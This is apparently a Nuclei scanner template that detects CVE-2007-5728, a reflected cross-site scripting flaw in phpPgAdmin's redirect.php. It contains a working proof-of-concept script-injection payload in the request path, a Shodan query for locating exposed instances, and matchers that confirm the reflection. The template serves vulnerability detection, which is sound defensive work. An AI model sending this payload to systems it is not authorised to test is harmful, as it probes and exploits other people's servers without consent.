id: CVE-2007-5728

info:
  name: phpPgAdmin <=4.1.1 - Cross-Site Scripting
  author: dhiyaneshDK
  severity: medium
  description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.
  remediation: |
    Upgrade to a patched version of phpPgAdmin or apply the necessary security patches provided by the vendor.
  reference:
    - https://www.exploit-db.com/exploits/30090
    - http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html
    - https://nvd.nist.gov/vuln/detail/CVE-2007-5728
    - http://www.debian.org/security/2008/dsa-1693
    - http://www.novell.com/linux/security/advisories/2007_24_sr.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2007-5728
    cwe-id: CWE-79
    epss-score: 0.02361
    epss-percentile: 0.88643
    cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: phppgadmin
    product: phppgadmin
    shodan-query: http.title:"phpPgAdmin"
  tags: cve,cve2007,xss,pgadmin,phppgadmin,edb

http:
  - method: GET
    path:
      - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<script>alert(document.domain)</script>'
          - 'phpPgAdmin'
        condition: and
        case-insensitive: true

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a00463044022003967d4428173fa3a66e3f0c4d0f92509435ecafe0351d5a934b605d591832fa022006af89ae1abc83ea90123587614406e808c06f93a4f3e73d4636015dd755ed97:922c64590222798bb761d5b6d8e72950